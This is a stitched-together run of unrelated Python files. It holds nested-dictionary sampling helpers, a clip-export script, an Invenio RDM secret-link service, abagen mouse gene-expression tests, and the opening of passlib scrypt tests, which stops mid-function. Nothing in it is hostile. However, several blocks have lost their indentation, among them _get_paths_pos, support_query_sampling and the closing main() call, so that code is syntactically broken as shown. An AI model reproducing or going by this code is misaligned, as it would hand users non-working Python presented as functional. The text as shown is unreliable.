    order = list(range(len(a)))
    random.shuffle(order)
    first = [a[j] for j in order[:s]]
    second = [a[j] for j in order[s:]]
    return first, second
def nested_dict(k, v):
    """Create a nested dictionary from a chain of keys.

    When `k` is a list or tuple, each key becomes one nesting level;
    an empty key sequence simply returns `v` (previously an IndexError).
    A scalar key produces a flat single-entry dictionary.

    Example
    -------
    `nested_dict(['a','b','c'], 0)` returns `{'a':{'b':{'c':0}}}`.
    """
    if isinstance(k, (list, tuple)):
        d = v
        # wrap from the innermost key outwards
        for q in reversed(k):
            d = {q: d}
        return d
    return {k: v}
def getitem(d:dict, k:list):
    """Retrieve an item from a nested dictionary by a chain of keys.

    Example
    -------
    For `{'a':{'b':{'c':0}}}`, the key `['a','b','c']` returns 0 and
    `['a','b']` returns `{'c':0}`; an empty chain returns `d` itself.
    """
    node = d
    for key in k:
        node = node[key]
    return node
def setitem(d:dict, k, v):
    """Set an item in a nested dictionary by a chain of keys.

    Missing intermediate nodes are created; intermediate values that are
    not plain dicts are overwritten by newly built nested dictionaries.
    (Rewritten without the bare ``except:`` that previously drove this
    logic via swallowed exceptions; observable behavior is unchanged.)

    Example: for `d={'a':{'b':{'c':0}}}`, `k=['a','b','c']` and `v=1`
    sets the dictionary to `d={'a':{'b':{'c':1}}}`.
    """
    assert type(d) is dict
    if isinstance(k, (list, tuple)):
        head, rest = k[0], k[1:]
        if not rest:
            d[head] = v
        elif type(d.get(head)) is dict:
            setitem(d[head], rest, v)
        else:
            # build the missing sub-tree from the innermost key outwards
            sub = v
            for q in reversed(rest):
                sub = {q: sub}
            d[head] = sub
    else:
        d[k] = v
# def setitem(d, k, v):
# # works only if `d` has the key `k[:-1`
# p = functools.reduce(dict.__getitem__, k[:-1], d)
# p[k[-1]] = v
def _get_paths_pos(d:dict, lvl:int=None) -> list:
L = []
if (lvl is None) or (type(lvl) is int and lvl >= 0):
for k,v in d.items():
# print(lvl,k,v)
# assert type(k) is str # not necessary
if type(v) is dict: # empty dictionary must be handled
foo = _get_paths_pos(v, None if lvl is None else lvl-1)
if foo:
# L += [k+sep+t for t in foo] # if a separator is used, working only for string keys
poo = []
for t in foo:
if type(t) is list:
poo.append([k, *t])
else:
poo.append([k, t])
L += poo
# L += [[k, *t] for t in foo] # trouble if t is not a list
else:
L.append([k])
else:
L.append([k])
return L
def _get_paths_neg(d:dict, lvl:int):
    """Collect key paths of a nested dictionary trimmed by a negative level.

    Full leaf paths are shortened by `-lvl` trailing keys and de-duplicated
    while preserving first-seen order.
    """
    assert lvl < 0
    paths = []
    for full in _get_paths_pos(d, None):
        trimmed = full[:lvl]
        if trimmed not in paths:
            paths.append(trimmed)
    return paths
def get_paths(d:dict, lvl:int=None):
    """Get all accessing paths (chains of keys) of a nested dictionary.

    Example: for `d={'a':{'b':{'c':0, 'd':1}}}`, `lvl=None` returns
    `[['a','b','c'], ['a','b','d']]`; `lvl=0` returns `[['a']]`; and
    `lvl=-1` returns `[['a','b']]`.
    """
    # negative levels trim full paths; everything else descends directly
    if lvl is not None and lvl < 0:
        return _get_paths_neg(d, lvl)
    return _get_paths_pos(d, lvl)
def sub_dict(d:dict, paths:list, *, compl=False):
    """Build a sub-dictionary of `d` from a set of key paths.

    With `compl=True` the complement is taken: every leaf path of `d`
    NOT rooted in `paths` is kept instead.

    Example: for `d={'a':{'b':{'c':0, 'd':1}}, 'e':{'f':2, 'g':3}}`,
    `paths=[['a'],['e','f']]` returns `{'a':{'b':{'c':0, 'd':1}}, 'e':{'f':2}}`;
    with `compl=True`, `paths=[['a']]` returns `{'e':{'f':2, 'g':3}}`.
    """
    if compl:
        # keep leaf paths that share no prefix with any requested path
        selected = [
            p for p in get_paths(d)
            if not any(q == p[:len(q)] for q in paths)
        ]
    else:
        selected = paths
    res = {}
    for k in selected:
        setitem(res, k, getitem(d, k))
    return res
def random_split_level(d:dict, ratio:float, lvl:int=None, *, index:int=None):
    """Randomly split a nested dictionary into two at a given level.

    The split point is `index` when provided, otherwise the fraction
    `ratio` of the number of paths at level `lvl`.
    """
    _paths = get_paths(d, lvl)
    split_at = int(len(_paths) * ratio) if index is None else index
    p1, p2 = random_split(_paths, split_at)
    return sub_dict(d, p1), sub_dict(d, p2)
def random_split_level_local(d:dict, ratio:float, lvl:int=None, *, index:int=None):
    """Split a nested dictionary at a given level, independently per parent node.

    Each node one level above `lvl` is split on its own, and the pieces are
    reassembled into two dictionaries with the original structure.
    """
    d1, d2 = {}, {}
    parents = _get_paths_neg(d, -1) if lvl is None else get_paths(d, lvl - 1)
    for p in parents:
        s1, s2 = random_split_level(getitem(d, p), ratio, 0, index=index)
        setitem(d1, p, s1)
        setitem(d2, p, s2)
    return d1, d2
def intersect(paths1:list, paths2:list):
    """Return all elements of `paths1` that have a root (prefix) in `paths2`.

    A path is emitted once per matching root, preserving the order of
    `paths1`.
    """
    return [p1 for p1 in paths1 for p2 in paths2 if p1[:len(p2)] == p2]
def common_roots(paths1:list, paths2:list):
    """Return the common roots (shared prefixes) of two path lists.

    For each pair, the shorter path is kept when it prefixes the longer;
    duplicates are removed while preserving first-seen order.
    """
    matches = []
    for p1 in paths1:
        for p2 in paths2:
            if p1[:len(p2)] == p2:
                matches.append(p2)
            elif p2[:len(p1)] == p1:
                matches.append(p1)
    # de-duplicate without set(): list elements are unhashable
    return functools.reduce(
        lambda acc, x: acc if x in acc else acc + [x], matches, []
    )
def sample(d:dict, n:int, lvl:int=None, paths:list=None, *, replace=False):
    """Draw `n` random entries from a nested dictionary at a given level.

    Arguments
    ---------
    d: nested dictionary to sample from
    n: number of entries to draw
    lvl: level at which paths are taken (see `get_paths`)
    paths: if given, restrict sampling to paths rooted in this list
    replace: if True, sample with replacement

    Raises
    ------
    ValueError: when sampling without replacement and fewer than `n`
        candidate paths exist.
    """
    _paths = get_paths(d, lvl)
    if paths:
        _paths = intersect(_paths, paths)
    if replace:
        picked = random.choices(_paths, k=n)  # with replacement
        return sub_dict(d, picked)
    if len(_paths) < n:
        # message fixed: was the ungrammatical "No enough elements."
        raise ValueError('Not enough elements.')
    random.shuffle(_paths)
    return sub_dict(d, _paths[:n])
def sample_local(d:dict, n:int, lvl:int=None, *, replace=False):
    """Draw `n` random entries per parent node of a nested dictionary.

    Each node one level above `lvl` is sampled independently, and the
    samples are reassembled into a dictionary with the original structure.
    """
    res = {}
    parents = _get_paths_neg(d, -1) if lvl is None else get_paths(d, lvl - 1)
    for p in parents:
        setitem(res, p, sample(getitem(d, p), n, 0, replace=replace))
    return res
# Sampling of the support and query set
def support_query_sampling(task:dict, ns:int, nq:int=None, lvl:int=None, *, split=False):
"""
"""
if split:
sd, qd = random_split_level_local(task, 0, lvl, index=ns)
if nq:
qd = sample_local(qd, nq, lvl)
else:
sd = sample_local(task, ns, lvl, replace=False) # dict of the support set
qd = sample_local(task, nq, lvl, replace=False) if nq else task.copy() # dict of the query set
return sd, qd
def from_folder(rootdir:str, func:Callable=None, filt:Callable=None) -> dict:
    """Create a nested dictionary representing the structure of a folder.

    Each sub-folder becomes a nesting level keyed by its name; each kept
    file becomes a leaf mapping the file name to ``func(path)`` (or None
    when no `func` is given). Folders containing no kept files contribute
    no node. The root folder's own name is popped off, so the returned
    dictionary starts at the root's children.

    Arguments
    ---------
    rootdir: path of a root folder
    func: function processing the content of a file, optional
    filt: boolean function filtering the input file names, optional
    References
    ----------
    - https://code.activestate.com/recipes/577879-create-a-nested-dictionary-from-oswalk/
    - https://stackoverflow.com/questions/28225552/is-there-a-recursive-version-of-the-dict-get-built-in
    - https://lerner.co.il/2014/05/11/creating-python-dictionaries-reduce/
    """
    res = {}
    # count = 0 # counter of the number of leaves
    # NOTE(review): presumably normalizes separators / trailing slash — confirm in `data` module
    rootdir = data.regularize_filename(rootdir)
    # rootdir = rootdir.rstrip(os.sep) # remove the trailing '/'
    # `start` makes walked paths relative to the PARENT of rootdir, so the
    # first path component is rootdir's own name (popped off at the end)
    start = rootdir.rfind(os.sep) + 1
    if filt is None:
        filt = lambda x: True  # default: keep every file
    for path, _, files in os.walk(rootdir):
        # chain of folder names from rootdir down to `path`
        folders = path[start:].split(os.sep)
        subdir = {f: func(os.path.join(path, f)) if func else None for f in files if filt(f)}
        # # equivalent to:
        # subdir = dict.fromkeys(files)
        # for f in files: # load image files if found
        # if func:
        # subdir[f] = func(os.path.join(path, f))
        # else:
        # subdir[f] = None
        # count += len(files)
        if subdir: # do not add node, in case of empty dictionary
            setitem(res, folders, subdir)
    # pop out the root level item (the rootdir name itself)
    return res.popitem()[1] if res else res
def count_leaves(d:dict) -> int:
    """Count the leaves (non-dict values) of a nested dictionary."""
    return sum(
        count_leaves(v) if type(v) is dict else 1
        for v in d.values()
    )
def count_nodes(d:dict) -> int:
    """Count the number of nodes (leaves included) in a nested dictionary."""
    total = len(d)
    for v in d.values():
        if type(v) is dict:
            total += count_nodes(v)
    return total
def count_leafnodes(d:dict) -> int:
    """Count the number of nodes with leaves in a nested dictionary.

    An empty dictionary counts zero; any non-empty dictionary whose
    sub-dictionaries hold no leaf nodes counts as one itself.
    """
    if not d:
        return 0
    inner = sum(count_leafnodes(v) for v in d.values() if type(v) is dict)
    return max(inner, 1)
def leaves_to_array(d:dict, lvl:int=None):
    """Collect the leaves of a nested dictionary into a numpy array.

    With `lvl=None` all leaves are gathered into one flat array; otherwise
    one entry per path at level `lvl` is produced (sub-dictionaries are
    themselves flattened to arrays of their leaves).
    """
    def _collect(sub:dict):
        # flatten every leaf reachable from `sub` into one array
        return np.asarray([getitem(sub, p) for p in get_paths(sub)])
    if lvl is None:
        return _collect(d)
    out = []
    for p in get_paths(d, lvl):
        node = getitem(d, p)
        out.append(_collect(node) if type(node) is dict else node)
    return np.asarray(out)
    # return np.concatenate(out)
def element_to_index(a:list):
    """Map each element of `a` to the index of its distinct value.

    Distinct values come from `set(a)` when the elements are hashable
    (arbitrary set order), otherwise from a first-seen scan. Returns a
    list of integer indices, one per element of `a`.
    """
    try:
        distinct = list(set(a))  # only works for hashable elements
    except TypeError:
        # unhashable elements: fall back to a first-seen linear scan
        # (previously a bare `except:` that swallowed every exception)
        distinct = []
        for u in a:
            if u not in distinct:
                distinct.append(u)
    # equality-based lookup, matching the original enumerate/break scan
    return [distinct.index(x) for x in a]
|
# main.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Dependencies
import os
import numpy as np
import pandas as pd
import bom1.bom1 as bom1
import argparse
import difflib
import re
import time
def main():
    """Command-line entry point: parse the query flags, filter the clip
    table accordingly, confirm with the user, and export the selection.
    """
    #Set up the arguments.
    parser = bom1.parser()
    args = parser.parse_args()
    #If args.no_normalize, then we should not normalize.
    if args.no_normalize:
        args.normalize = False
    #A few assertions
    assert args.prepad >= 0, f'args.prepad should be 0 or greater. args.prepad: {args.prepad}'
    assert args.postpad >= 0, f'args.postpad should be 0 or greater. args.postpad: {args.postpad}'
    if not args.silent:
        #Print the welcome message.
        bom1.welcome()
    #Load the clips
    clips = bom1.load_clips(load_empty = args.load_empty)
    n = len(clips)
    #Make sure that we have the ./export folder.
    if not os.path.exists('./export'):
        os.mkdir('./export')
    #Construct the masks for each query.
    #Each mask is a length-n boolean array; a filter left at its default
    #value becomes an all-True mask so it has no effect on the selection.
    if args.clip_name is not None:
        clipname_mask = (clips['name'].str.findall(args.clip_name).astype(bool)).to_numpy()
    else:
        clipname_mask = np.ones(n).astype(bool)
    if args.min_rating != 0:
        minrating_mask = (args.min_rating <= clips['rating']).to_numpy()
    else:
        minrating_mask = np.ones(n).astype(bool)
    if args.max_rating != 10:
        maxrating_mask = (clips['rating'] <= args.max_rating).to_numpy()
    else:
        maxrating_mask = np.ones(n).astype(bool)
    if args.min_duration != 0:
        minduration_mask = (args.min_duration <= clips['duration']).to_numpy()
    else:
        minduration_mask = np.ones(n).astype(bool)
    if args.max_duration != np.inf:
        maxduration_mask = (clips['duration'] <= args.max_duration).to_numpy()
    else:
        maxduration_mask = np.ones(n).astype(bool)
    if args.tag != '':
        #Tags are matched by regex against the set of unique tag values.
        tags = [tag for tag in clips['tag'].unique() if re.search(args.tag, tag) is not None]
        tags_mask = (clips['tag'].isin(tags)).to_numpy()
    else:
        tags_mask = np.ones(n).astype(bool)
    if args.min_t1 != 0:
        mint1_mask = args.min_t1 <= clips['t1'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy()
    else:
        mint1_mask = np.ones(n).astype(bool)
    if args.max_t1 != np.inf:
        maxt1_mask = clips['t1'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy() <= args.max_t1
    else:
        maxt1_mask = np.ones(n).astype(bool)
    if args.min_t2 != 0:
        mint2_mask = args.min_t2 <= clips['t2'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy()
    else:
        mint2_mask = np.ones(n).astype(bool)
    if args.max_t2 != np.inf:
        maxt2_mask = clips['t2'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy() <= args.max_t2
    else:
        maxt2_mask = np.ones(n).astype(bool)
    if args.include_placeholder:
        #We should include placeholders.
        placeholder_mask = np.ones(n).astype(bool)
    else:
        #Only keep clips where the name is not "placeholder".
        placeholder_mask = clips['name'].str.lower() != 'placeholder'
    if args.no_prefix:
        prefix = ''
    else:
        #Prefix encodes the tag, clip number and rating, e.g. "tag_C01_R05_".
        prefix = clips['tag']+'_C'+clips['nclip'].astype(str).str.zfill(2)+'_R'+clips['rating'].astype(str).str.zfill(2)+'_'
    #Stitch together the pathout.
    clips['pathout'] = ('./export/'+prefix+clips['name']+'.'+args.file_type)
    #Combine all of the masks into a final single mask, and cut out the relevant clips.
    final_mask = (clipname_mask) & (minrating_mask) & (maxrating_mask) & (minduration_mask) & (maxduration_mask) & (tags_mask)\
                & (mint1_mask) & (maxt1_mask) & (mint2_mask) & (maxt2_mask) & (placeholder_mask)
    clips_final = clips.copy().loc[final_mask]
    #Check if there are any clips.
    if len(clips_final) == 0:
        if not np.any(clipname_mask):
            print('There are no clips with the specified name.')
            #Suggest close matches in case the name query was a typo.
            close_match = difflib.get_close_matches(args.clip_name, list(clips['name']))
            if close_match != []:
                print(f'Did you perhaps mean {close_match}?')
        else:
            print('No clips met the specified query.')
        return
    n = len(clips_final)
    if not args.silent:
        bom1.print_clips(clips_final)
    #If we pass the --list args, then it should only print.
    if args.list:
        return
    #If args.silent, then we don't prompt the user.
    if not args.silent:
        if n > 1:
            print('')
            prompt = input(f'A total of {n} clips were found. Do you want to export as {args.file_type}? [y/n] ').lower().strip() #Ask for confirmation if several clips are exported.
            print('')
        else:
            prompt = input(f'A single clip was found. Do you want to export as {args.file_type}? [y/n] ').lower().strip() #Ask for confirmation if several clips are exported.
            print('')
        #An empty answer counts as consent; anything but 'y'/'' aborts.
        if (prompt != 'y') and (prompt != ''):
            return
    #Start time before clipping.
    start_time = time.time()
    #Call to the clipper.
    bom1.clip(clips_final['t1'].tolist(), clips_final['t2'].tolist(), clips_final['link'].tolist(), clips_final['pathout'], args)
    end_time = time.time()
    if not args.silent:
        print('')
        print("Time elapsed: {:.2f} seconds.".format(end_time-start_time))
if __name__ == '__main__':
main() |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020-2021 CERN.
# Copyright (C) 2020-2021 Northwestern University.
# Copyright (C) 2021 <NAME>.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""RDM Secret Link Service."""
from datetime import datetime
import arrow
from flask_babelex import lazy_gettext as _
from invenio_db import db
from invenio_drafts_resources.services.records import RecordService
from invenio_records_resources.services.records.schema import \
ServiceSchemaWrapper
from invenio_records_resources.services.uow import RecordCommitOp, unit_of_work
from marshmallow.exceptions import ValidationError
from sqlalchemy.orm.exc import NoResultFound
from ...secret_links.errors import InvalidPermissionLevelError
class SecretLinkService(RecordService):
    """RDM Secret Link service.

    Manages the secret links stored on a record's parent: creation,
    listing, retrieval, update and deletion.  Every operation requires
    the "manage" permission on the record (or draft).
    """

    def link_result_item(self, *args, **kwargs):
        """Create a new instance of the resource unit."""
        return self.config.link_result_item_cls(*args, **kwargs)

    def link_result_list(self, *args, **kwargs):
        """Create a new instance of the resource list."""
        return self.config.link_result_list_cls(*args, **kwargs)

    def get_parent_and_record_or_draft(self, _id):
        """Return parent and (record or draft)."""
        try:
            record, parent = self._get_record_and_parent_by_id(_id)
        except NoResultFound:
            # no published record with this id -- fall back to the draft
            record, parent = self._get_draft_and_parent_by_id(_id)
        return record, parent

    @property
    def schema_secret_link(self):
        """Schema for secret links."""
        return ServiceSchemaWrapper(
            self, schema=self.config.schema_secret_link
        )

    def _find_link(self, parent, link_id):
        """Return ``(index, resolved link)`` for ``link_id`` on ``parent``.

        :raises LookupError: if the parent has no link with the given id.
        """
        # Compare ids as strings on BOTH sides: previously the membership
        # test used str(link_id) but the index lookup used the raw value,
        # so a non-str id could pass the check yet fail .index().
        wanted = str(link_id)
        link_ids = [str(link.link_id) for link in parent.access.links]
        if wanted not in link_ids:
            raise LookupError(wanted)
        link_idx = link_ids.index(wanted)
        return link_idx, parent.access.links[link_idx].resolve()

    def _commit_and_reindex(self, record, parent, uow):
        """Register commit ops for parent (and record) and reindex children."""
        uow.register(RecordCommitOp(parent))
        if record:
            uow.register(RecordCommitOp(record))
        # Index all child records of the parent
        self._index_related_records(record, parent, uow=uow)

    def _validate_secret_link_expires_at(
        self, expires_at, is_specified=True, secret_link=None
    ):
        """Validate the given expiration date.

        If a ``secret_link`` is specified, the validity of setting its
        expiration date to ``expires_at`` will be checked additionally.
        The ``is_specified`` flag hints at if the value of ``expires_at``
        was set in the given data, or if it was omitted (which makes a
        difference in patch operations).

        :returns: the expiration date, normalized to a naive UTC datetime.
        :raises ValidationError: if the date is in the past, or would
            postpone an existing link's expiration.
        """
        if expires_at and is_specified:
            # if the expiration date was specified, check if it's in the future
            expires_at = arrow.get(expires_at).to("utc").datetime
            expires_at = expires_at.replace(tzinfo=None)
            if expires_at < datetime.utcnow():
                raise ValidationError(
                    message=_("Expiration date must be set to the future"),
                    field_name="expires_at",
                )
        if secret_link is not None:
            # if we're updating an existing secret link, we need to do some
            # more checks...
            # we interpret explicitly setting 'expires_at = null/None' as
            # removing the expiration date (semantically different from not
            # specifying an 'expires_at' value at all, at least for updates)
            increases_expiration = (
                is_specified and not expires_at and secret_link.expires_at
            ) or (
                expires_at
                and secret_link.expires_at
                and expires_at > secret_link.expires_at
            )
            if increases_expiration:
                # it's not a problem to reduce the validity of a token (*),
                # but increasing its lifespan would require a new signature,
                # and thus a new token
                # (*) in that case, the permission generator will still say
                #     no, even if the signature is still valid
                raise ValidationError(
                    message=_("Cannot postpone expiration of links"),
                    field_name="expires_at",
                )
            elif expires_at and expires_at < datetime.utcnow():
                raise ValidationError(
                    message=_("Expiration date must be set to the future"),
                    field_name="expires_at",
                )
        return expires_at

    @unit_of_work()
    def create(
        self,
        identity,
        id_,
        data,
        links_config=None,
        uow=None
    ):
        """Create a secret link for a record (resp. its parent)."""
        record, parent = self.get_parent_and_record_or_draft(id_)
        # Permissions
        self.require_permission(identity, "manage", record=record)
        # Validation
        data, __ = self.schema_secret_link.load(
            data, context=dict(identity=identity), raise_errors=True
        )
        expires_at = self._validate_secret_link_expires_at(
            data.get("expires_at")
        )
        if "permission" not in data:
            raise ValidationError(
                _("An access permission level is required"),
                field_name="permission",
            )
        # Creation
        try:
            link = parent.access.links.create(
                permission_level=data["permission"],
                expires_at=expires_at,
                extra_data=data.get("extra_data", {}),
            )
        except InvalidPermissionLevelError:
            raise ValidationError(
                _("Invalid access permission level."),
                field_name="permission",
            )
        # Commit and reindex
        self._commit_and_reindex(record, parent, uow)
        return self.link_result_item(
            self,
            identity,
            link,
            links_config=links_config,
        )

    def read_all(
        self,
        identity,
        id_,
        links_config=None,
    ):
        """Read the secret links of a record (resp. its parent)."""
        record, parent = self.get_parent_and_record_or_draft(id_)
        # Permissions
        self.require_permission(identity, "manage", record=record)
        # Fetching
        links = parent.access.links.resolve_all()
        return self.link_result_list(
            service=self,
            identity=identity,
            results=links,
            links_config=links_config,
        )

    def read(
        self,
        identity,
        id_,
        link_id,
        links_config=None,
    ):
        """Read a specific secret link of a record (resp. its parent)."""
        record, parent = self.get_parent_and_record_or_draft(id_)
        # Permissions
        self.require_permission(identity, "manage", record=record)
        # Fetching
        __, link = self._find_link(parent, link_id)
        return self.link_result_item(
            self,
            identity,
            link,
            links_config=links_config,
        )

    @unit_of_work()
    def update(
        self,
        identity,
        id_,
        link_id,
        data,
        links_config=None,
        uow=None,
    ):
        """Update a secret link for a record (resp. its parent)."""
        record, parent = self.get_parent_and_record_or_draft(id_)
        # Permissions
        self.require_permission(identity, "manage", record=record)
        # Fetching (required for parts of the validation)
        __, link = self._find_link(parent, link_id)
        # Validation
        data, __ = self.schema_secret_link.load(
            data, context=dict(identity=identity), raise_errors=True
        )
        permission = data.get("permission")
        expires_at = self._validate_secret_link_expires_at(
            data.get("expires_at"),
            is_specified=("expires_at" in data),
            secret_link=link,
        )
        # Update
        # we can't update the link's extra data, as that is encoded
        # in the token and would thus require a new token
        link.expires_at = expires_at or link.expires_at
        link.permission_level = permission or link.permission_level
        # Commit and reindex
        self._commit_and_reindex(record, parent, uow)
        return self.link_result_item(
            self,
            identity,
            link,
            links_config=links_config,
        )

    @unit_of_work()
    def delete(
        self,
        identity,
        id_,
        link_id,
        links_config=None,
        uow=None
    ):
        """Delete a secret link for a record (resp. its parent)."""
        record, parent = self.get_parent_and_record_or_draft(id_)
        # Permissions
        self.require_permission(identity, "manage", record=record)
        # Fetching
        link_idx, link = self._find_link(parent, link_id)
        # Deletion: remove the link from the parent, then revoke the token
        parent.access.links.pop(link_idx)
        link.revoke()
        # Commit and reindex
        self._commit_and_reindex(record, parent, uow)
        return True
|
# -*- coding: utf-8 -*-
import numpy as np
import pytest
from abagen.mouse import mouse
STRUCTURES = [182305713, 182305709, 182305705]
ATTRIBUTES = ['expression_energy', 'expression_density', 'sum_pixels']
# Expected unionization values, keyed on experiment ID.  The attribute
# keys MUST use the same underscore spelling as ATTRIBUTES: the test
# below intersects these keys with the requested attributes, so the
# previous hyphenated keys ('expression-energy', ...) for experiment
# 69782969 never matched and its assertions were silently skipped.
EXPERIMENTS = {
    986: {
        'expression_energy': np.array([7.73432, 7.28206, 3.82741]),
        'expression_density': np.array([0.0603072, 0.0553335, 0.0298628]),
        'sum_pixels': np.array([419628.0, 2238000.0, 3629050.0])
    },
    69782969: {
        'expression_energy': np.array([1.00879, 1.40198, 2.34988]),
        'expression_density': np.array([0.00650952, 0.00896709, 0.015409]),
        'sum_pixels': np.array([195863.0, 1051230.0, 1440430.0])
    }
}
GBA_UNIONIZATION = {
    'expression_energy': np.array([0.236301, 0.261266, 0.416281]),
    'expression_density': np.array([0.00207073, 0.00232453, 0.00372069]),
    'sum_pixels': np.array([419628.0, 2238000.0, 3636670.0]),
    'voxel_energy_cv': np.array([0.923913, 0.995631, 0.81265])
}
@pytest.mark.parametrize(('genes', 'direction', 'expected'), [
    (dict(acronym='Snca'), 'sagittal', [988, 990, 79904550]),
    (dict(acronym='Snca'), 'coronal', [986, 79908848]),
    (dict(acronym='Gba'), 'sagittal', [1612]),
    (dict(acronym='Gba'), 'coronal', [1611]),
    (dict(acronym='Elf4'), 'sagittal', [73834415, 77464840]),
    (dict(id=84193), 'sagittal', [70238925, 71147924, 71213117]),
    (dict(id=84193), 'coronal', [74047443]),
    (dict(id=18608), 'sagittal', [69289721]),
])
def test_get_experiments_from_gene(genes, direction, expected):
    """Experiment lookup rejects bad inputs and returns the expected IDs."""
    # invalid acronym, slicing direction, and gene id must all be rejected
    with pytest.raises(ValueError):
        mouse._get_experiments_from_gene(acronym='notagene',
                                         slicing_direction='coronal')
    with pytest.raises(ValueError):
        mouse._get_experiments_from_gene(id=84193,
                                         slicing_direction='notadirection')
    with pytest.raises(ValueError):
        mouse._get_experiments_from_gene(id=-1000000)
    # a valid query returns exactly the expected experiment IDs
    found = mouse._get_experiments_from_gene(**genes,
                                             slicing_direction=direction)
    assert sorted(found) == sorted(expected)
@pytest.mark.parametrize(('experiment', 'attributes'), [
    (986, None), (986, ATTRIBUTES), (986, 'all'),
    (69782969, None), (69782969, ATTRIBUTES), (69782969, 'all')
])
def test_get_unionization_from_experiment(experiment, attributes):
    """Unionization data for an experiment matches the stored references."""
    # an invalid experiment id is rejected
    with pytest.raises(ValueError):
        mouse._get_unionization_from_experiment(-100, structures=STRUCTURES)
    # get data from provided experiment
    data = mouse._get_unionization_from_experiment(experiment,
                                                   structures=STRUCTURES,
                                                   attributes=attributes)
    data.index = data.index.droplevel('gene_id')
    # normalize the requested attribute list the same way the API does
    if attributes is None:
        attributes = ['expression_density']
    elif attributes == 'all':
        attributes = mouse._UNIONIZATION_ATTRIBUTES
    assert len(data.columns) == len(attributes)
    for attr in set(EXPERIMENTS[experiment].keys()).intersection(attributes):
        # Series.get_values() was removed in pandas 1.0 -- use to_numpy()
        assert np.allclose(data.loc[STRUCTURES, attr].to_numpy(),
                           EXPERIMENTS[experiment][attr])
@pytest.mark.parametrize(('attribute'), [
    'expression_energy', 'expression_density', 'sum_pixels', 'voxel_energy_cv'
])
def test_get_unionization_from_gene(attribute):
    """Gene-level unionization values match the stored Gba references."""
    # both of these invalid queries must be rejected
    for bad_kwargs in (
        dict(acronym='Gba', slicing_direction='notadirection'),
        dict(id=18608, slicing_direction='coronal'),
    ):
        with pytest.raises(ValueError):
            mouse.get_unionization_from_gene(structures=STRUCTURES,
                                             **bad_kwargs)
    # fetch the data and compare against the stored reference values
    unionization = mouse.get_unionization_from_gene(acronym='Gba',
                                                    slicing_direction='coronal',
                                                    structures=STRUCTURES,
                                                    attributes=attribute)
    unionization.index = unionization.index.droplevel('gene_id')
    assert np.allclose(unionization.loc[STRUCTURES, attribute],
                       GBA_UNIONIZATION[attribute])
|
<gh_stars>100-1000
"""tests for passlib.utils.scrypt"""
#=============================================================================
# imports
#=============================================================================
# core
from binascii import hexlify
import hashlib
import logging; log = logging.getLogger(__name__)
import struct
import warnings
warnings.filterwarnings("ignore", ".*using builtin scrypt backend.*")
# site
# pkg
from passlib import exc
from passlib.utils import getrandbytes
from passlib.utils.compat import PYPY, u, bascii_to_str
from passlib.utils.decor import classproperty
from passlib.tests.utils import TestCase, skipUnless, TEST_MODE, hb
# subject
from passlib.crypto import scrypt as scrypt_mod
# local
__all__ = [
"ScryptEngineTest",
"BuiltinScryptTest",
"FastScryptTest",
]
#=============================================================================
# support functions
#=============================================================================
def hexstr(data):
    """return bytes as hex str"""
    encoded = hexlify(data)
    # convert ascii bytes to native str type
    return bascii_to_str(encoded)
def unpack_uint32_list(data, check_count=None):
    """unpack bytes as tuple of little-endian uint32 values"""
    count = len(data) // 4
    # optional sanity check on the expected number of words
    assert check_count is None or check_count == count
    layout = struct.Struct("<%dI" % count)
    return layout.unpack(data)
def seed_bytes(seed, count):
    """
    generate random reference bytes from specified seed.
    used to generate some predictable test vectors.
    """
    if hasattr(seed, "encode"):
        seed = seed.encode("ascii")
    # stretch the seed with a counter-mode sha256 stream
    chunks = []
    total = 0
    counter = 0
    while total < count:
        digest = hashlib.sha256(seed + struct.pack("<I", counter)).digest()
        chunks.append(digest)
        total += len(digest)
        counter += 1
    return b"".join(chunks)[:count]
#=============================================================================
# test builtin engine's internals
#=============================================================================
class ScryptEngineTest(TestCase):
    """Checks the builtin scrypt engine's internals against known vectors."""
    descriptionPrefix = "passlib.crypto.scrypt._builtin"
    def test_smix(self):
        """smix() -- verified against the scrypt RFC draft test vector"""
        from passlib.crypto.scrypt._builtin import ScryptEngine
        rng = self.getRandom()
        #-----------------------------------------------------------------------
        # test vector from (expired) scrypt rfc draft
        # (https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 9)
        #-----------------------------------------------------------------------
        input = hb("""
            f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
            77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
            89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
            09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
            89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
            cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
            67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
            7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
            """)
        output = hb("""
            79 cc c1 93 62 9d eb ca 04 7f 0b 70 60 4b f6 b6
            2c e3 dd 4a 96 26 e3 55 fa fc 61 98 e6 ea 2b 46
            d5 84 13 67 3b 99 b0 29 d6 65 c3 57 60 1f b4 26
            a0 b2 f4 bb a2 00 ee 9f 0a 43 d1 9b 57 1a 9c 71
            ef 11 42 e6 5d 5a 26 6f dd ca 83 2c e5 9f aa 7c
            ac 0b 9c f1 be 2b ff ca 30 0d 01 ee 38 76 19 c4
            ae 12 fd 44 38 f2 03 a0 e4 e1 c4 7e c3 14 86 1f
            4e 90 87 cb 33 39 6a 68 73 e8 f9 d2 53 9a 4b 8e
            """)
        # NOTE: p value should be ignored, so testing w/ random inputs.
        engine = ScryptEngine(n=16, r=1, p=rng.randint(1, 1023))
        self.assertEqual(engine.smix(input), output)
    def test_bmix(self):
        """bmix() -- reference vector plus custom vectors for r=2..4"""
        from passlib.crypto.scrypt._builtin import ScryptEngine
        rng = self.getRandom()
        # NOTE: bmix() call signature currently takes in list of 32*r uint32 elements,
        #       and writes to target buffer of same size.
        def check_bmix(r, input, output):
            """helper to check bmix() output against reference"""
            # NOTE: * n & p values should be ignored, so testing w/ rng inputs.
            #       * target buffer contents should be ignored, so testing w/ random inputs.
